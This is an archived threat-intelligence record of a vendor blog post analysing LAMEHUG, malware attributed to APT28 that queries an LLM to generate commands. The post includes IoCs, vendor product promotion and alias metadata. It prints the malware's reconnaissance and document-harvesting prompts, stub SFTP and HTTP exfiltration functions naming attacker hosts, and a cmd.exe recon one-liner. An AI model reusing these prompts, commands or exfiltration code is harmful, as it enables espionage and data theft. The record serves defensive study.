{
	"id": "bd044c41-61a6-4398-9679-ae5038af8997",
	"created_at": "2026-04-06T00:21:34.575979Z",
	"updated_at": "2026-04-10T03:37:49.770294Z",
	"deleted_at": null,
	"sha1_hash": "caaae9bdb5f10d917eccc025d277fe2e5e7865ce",
	"title": "Cato CTRL™ Threat Research: Analyzing LAMEHUG – First Known LLM-Powered Malware with Links to APT28 (Fancy Bear)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 95562,
	"plain_text": "Cato CTRL™ Threat Research: Analyzing LAMEHUG – First Known\r\nLLM-Powered Malware with Links to APT28 (Fancy Bear)\r\nBy null\r\nPublished: 2025-07-23 · Archived: 2026-04-05 17:40:30 UTC\r\nExecutive Summary \r\nOn July 17, 2025, Ukraine’s Computer Emergency Response Team (CERT-UA) publicly reported LAMEHUG, which is\r\nbeing documented as the first known malware that integrates large language model (LLM) capabilities directly into its attack\r\nmethodology.  \r\nKey Facts: \r\nDiscovery Date: July 10, 2025 \r\nAttribution: APT28 (Fancy Bear) with moderate confidence, according to CERT-UA. \r\nTarget: Ukrainian government officials. \r\nAttack Vector: Phishing emails impersonating Ukrainian ministry officials and containing ZIP archives with\r\nPyInstaller-compiled Python executables. \r\nTechnical Innovation: Malware uses LLM Qwen2.5-Coder-32B-Instruct for real-time command generation. Our\r\nanalysis is that APT28 used approximately 270 Hugging Face tokens for authentication. \r\nAssessment: Proof-of-concept (PoC) exploration of LLM integration in state-sponsored cyber operations.  \r\nTechnical Overview \r\nInitial Discovery and Distribution \r\nThe LAMEHUG campaign began when CERT-UA received reports about suspicious email distribution among Ukrainian\r\ngovernment officials. The emails appeared to be sent from representatives of relevant ministries, containing an attachment\r\nnamed “Додаток.pdf.zip” (Attachment.pdf.zip). \r\nLLM Integration  \r\nLAMEHUG’s defining characteristic is its integration of AI for dynamic attack generation. According to CERT-UA’s alert,\r\nthe malware “uses the LLM Qwen2.5-Coder-32B-Instruct via the huggingface[.]co service API to generate commands based\r\non statically entered text (description) for their subsequent execution on a computer.”  \r\nLAMEHUG Variants  \r\nThe ZIP archive contained an executable file with a “.pif” extension, which was converted from Python source code using\r\nPyInstaller. 
CERT-UA discovered multiple variants of the LAMEHUG malware: \r\nДодаток.pif (Attachment.pif) \r\nsave_document.py \r\nAI_generator_uncensored_Canvas_PRO_v0.9.exe \r\nAI_image_generator_v0.95.exe \r\nimage.py \r\nThese variants demonstrated functional differences in data exfiltration methods, indicating ongoing development and\r\nadaptation of the malware family. \r\nReverse Engineering: The Actual Prompts \r\nOur analysis of the malware samples revealed the exact prompts being sent to the LLM. The malware uses base64-encoded\r\nprompts to obscure its intentions.  \r\nhttps://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/\r\nPage 1 of 6\n\nFigure 1. Додаток.pif.pdf (Attachment.pif.pdf) that the user sees while the malware is being executed \r\nPrompt Analysis of Додаток.pif Variant \r\nFigure 2. Додаток.pif prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model (example #1) \r\nFigure 3. Додаток.pif prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model (example #2) \r\nFigure 4. Додаток.pif prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model (example #3) \r\nThe Додаток.pif variant uses two specific prompts: \r\n1. System Information Gathering Prompt: “Make a list of commands to create folder C:\\Programdata\\info and to\r\ngather computer information, hardware information, process and services information, networks information, AD\r\ndomain information, to execute in one line and add each result to text file c:\\Programdata\\info\\info.txt. Return only\r\ncommands, without markdown.” \r\n2. Document Harvesting Prompt: “Make a list of commands to copy recursively different office and pdf/txt\r\ndocuments in user Documents, Downloads and Desktop folders to a folder c:\\Programdata\\info\\ to execute in one\r\nline. 
Return only command, without markdown.” \r\nPrompt Analysis of AI Image Generator Variants \r\nFigure 5. image.py prompts that are being sent to the Qwen2.5-Coder-32B-Instruct model \r\nThe AI image generator variants (AI_generator_uncensored_Canvas_PRO_v0.9.exe and AI_image_generator_v0.95.exe)\r\nuse a provocative image generation prompt as a lure: \r\n“Curvy naked woman sitting, long beautiful legs, front view, full body view, visible face.” \r\nThese variants contact the Flux AI image generator API (https://router.huggingface.co/nebius/v1/images/generations) while\r\nsimultaneously executing the same data collection and exfiltration routines in the background. \r\nMalware Operation Flow \r\nBased on our analysis, LAMEHUG operates through the following process: \r\n1. Prompt Generation: The malware contains pre-defined, base64-encoded text descriptions of desired attack\r\nobjectives.  \r\n2. API Communication: The malware sends these prompts to the Qwen2.5-Coder-32B-Instruct model via Hugging\r\nFace’s API using approximately 270 tokens for authentication. \r\n3. Command Generation: The LLM responds with executable command sequences tailored to the requested\r\nobjective.  \r\n4. Real-Time Execution: The malware immediately executes the AI-generated commands on the target system.  \r\nExfiltration Methods \r\nThe malware implements two different exfiltration methods depending on the variant.  
\r\nSFTP Exfiltration (image.py variant) \r\ndef ssh_send(path):\r\n address = '144[.]126[.]202[.]227'\r\n port = 22\r\n username = 'upstage'\r\n password = 'upstage'\r\n target_path = '/tmp/upl/'\r\n # [SFTP upload logic]\r\nHTTP POST Exfiltration (Додаток.pif variant) \r\ndef send(path):\r\n url = 'https[:]//stayathomeclasses[.]com/slpw/up[.]php'\r\n # [HTTP POST upload logic]\r\nLLM-Generated Command Analysis \r\nCERT-UA documented the actual command sequence generated by the LLM integration, demonstrating the sophisticated\r\nreconnaissance capabilities achieved through dynamic AI generation.  \r\ncmd.exe /c \"mkdir %PROGRAMDATA%\\info \u0026\u0026 systeminfo \u003e\u003e %PROGRAMDATA%\\info\\info.txt \u0026\u0026 wmic computersystem get name,manufac\r\nThis comprehensive command sequence demonstrates the LLM’s ability to generate extensive system reconnaissance\r\ncommands that collect: \r\nHardware and System Information: wmic, systeminfo \r\nRunning Processes and Services: tasklist, net start \r\nNetwork Configuration Details: ipconfig, wmic nic \r\nUser and Group Information: whoami, dsquery \r\nComplete Active Directory (AD) Structure Enumeration: full use of dsquery \r\nAttribution Assessment: APT28 Testing New Capabilities \r\nCERT-UA attributes the LAMEHUG campaign to APT28 (Fancy Bear) with moderate confidence. APT28 is associated with\r\nRussia’s Main Intelligence Directorate (GRU) Unit 26165. \r\nWhy This Appears to Be PoC Testing \r\nBased on our analysis of the actual malware code and operational characteristics, several factors suggest APT28 is testing\r\nnew LLM capabilities rather than executing a sophisticated operational deployment: \r\n1. Code Simplicity: The Python scripts are relatively basic, lacking the sophisticated evasion techniques typically\r\nassociated with APT28 operations.  \r\n2. 
Obvious AI Integration: The LLM integration is implemented straightforwardly without attempts to obfuscate or\r\nhide the AI service usage.  \r\n3. Limited Operational Security: The use of easily identifiable prompts and legitimate AI services without advanced\r\nmasking techniques.  \r\n4. Testing Ground: Ukraine has historically served as a testing ground for Russian cyber capabilities, making it an\r\nideal location for PoC deployments.  \r\n5. Multiple Variants: The presence of different variants with varying exfiltration methods suggests experimentation\r\nwith various approaches.  \r\nDetection Challenges for Traditional Security Solutions \r\nLAMEHUG introduces fundamental challenges for traditional cybersecurity approaches: \r\nSignature-based detection fails due to dynamic command generation.  \r\nNetwork traffic appears legitimate (AI API usage).  \r\nBehavioral analysis requires new methodologies specific to LLM-powered threats.  \r\nSecurity Best Practices \r\nShadow AI (Visibility and Control)  \r\nThe most critical protection against LAMEHUG-style threats is controlling AI access: \r\nEnforce Approved LLMs Only: Define which generative AI (GenAI) applications users can access and exactly\r\nwhat actions are allowed (upload, download, etc.).  \r\nReal-Time Data Protection: Limit or prevent sensitive data from being uploaded to LLMs, avoiding data security\r\nand confidentiality violations in real-time.  \r\nComprehensive Visibility: Monitor all GenAI usage across the organization with a catalog of 950+ GenAI\r\napplications from Cato CASB.  \r\nNetwork-Level Protection \r\nML-Powered Malware Detection: Cato NGAM uses ML algorithms to detect zero-day and polymorphic malware.  \r\nDNS Security: DNS protection integrated into Cato IPS analyzes DNS queries and responses to block malicious\r\ndomains.  
\r\nApplication Control: Monitor and control access to cloud services and APIs, with specific focus on AI platforms.  \r\nExtended Detection and Response \r\nWith Cato XDR, organizations can enable:  \r\nAI/ML Threat Hunting: Continuous ML-based threat hunting and UEBA baseline for every user, host, and app—\r\ndetecting stealthy malware or anomalous behavior that bypasses preventive controls. \r\nSmart Investigation: Automatic incident correlation with dynamic risk scoring, displayed in a pivot-enabled analyst\r\nworkbench for quick deep dives from high-level “Story” to raw flows and logs. \r\nOne-Click Response: Built-in remediation enables security analysts to quarantine hosts, deploy new SDP/firewall\r\nrules, or trigger endpoint actions instantly—all from a single console. \r\nLateral Movement Protection \r\nLateral Movement: Cato IPS provides detection, discovery and blocking of lateral movement patterns and\r\nindicators, preventing malware propagation across the WAN.  \r\nZero Trust Network Access \r\nMicrosegmentation: Cato Universal ZTNA allows organizations to segment their networks into smaller parts with\r\nsoftware-defined security perimeters that limit lateral movement.  \r\nConclusion \r\nThe discovery of LAMEHUG by CERT-UA marks a significant milestone in the threat landscape. While this campaign\r\nappears to be a PoC test by APT28 (Fancy Bear), it signals the beginning of a new era where AI is directly incorporated into\r\nmalware operations. The campaign highlights state-sponsored investment in emerging AI technologies for cyber activities,\r\nwith Ukraine serving as the testing ground for these new capabilities. The relatively simple implementation suggests this is\r\nAPT28’s attempt at learning how to weaponize LLMs, likely opening the door for more sophisticated AI-driven campaigns\r\nin the future.  
\r\nOrganizations that leverage a SASE platform, such as the Cato SASE Cloud Platform, are better positioned to defend against\r\nemerging AI-powered threats through integrated security controls, behavioral analysis, and advanced threat prevention\r\ncapabilities. As threat actors continue to evolve their tactics to include AI technologies, AI security solutions must evolve to\r\nprovide AI-aware protection mechanisms. \r\nIndicators of Compromise (IoCs) \r\nFile Indicators \r\nMD5 SHA256 Filename\r\nabe531e9f1e642c47260fac40dc41f59 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777 Додаток[.]pif\r\n3ca2eaf204611f3314d802c8b794ae2c d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e AI_generator_uncensored_C\r\nf72c45b658911ad6f5202de55ba6ed5c bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3 AI_image_generator_v0.95[.\r\n81cd20319c8f0b2ce499f9253ce0a6a8 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715 Image[.]py\r\nNetwork Infrastructure \r\nCommand and Control:\r\n144[.]126.202.227 (SFTP server for data exfiltration) \r\nstayathomeclasses[.]com (compromised hosting resource) \r\nhttps://stayathomeclasses[.]com/slpw/up.php (exfiltration endpoint) \r\nDistribution:\r\nboroda70@meta[.]ua (compromised email account) \r\n192[.]36.27.37 (email sending infrastructure via LeVPN) \r\nLLM API Endpoints:\r\nhttps[:]//router[.]huggingface.co/hyperbolic/v1/chat/completions \r\nhttps[:]//router[.]huggingface.co/nebius/v1/images/generations \r\nHost-Based Artifacts \r\n%PROGRAMDATA%\\info\\ (data staging directory) \r\n%PROGRAMDATA%\\info\\info.txt (system information collection file) \r\n%PROGRAMDATA%\\Додаток.pdf (decoy document) \r\nSource: https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/"
	],
	"report_names": [
		"cato-ctrl-threat-research-analyzing-lamehug"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434894,
	"ts_updated_at": 1775792269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/caaae9bdb5f10d917eccc025d277fe2e5e7865ce.pdf",
		"text": "https://archive.orkl.eu/caaae9bdb5f10d917eccc025d277fe2e5e7865ce.txt",
		"img": "https://archive.orkl.eu/caaae9bdb5f10d917eccc025d277fe2e5e7865ce.jpg"
	}
}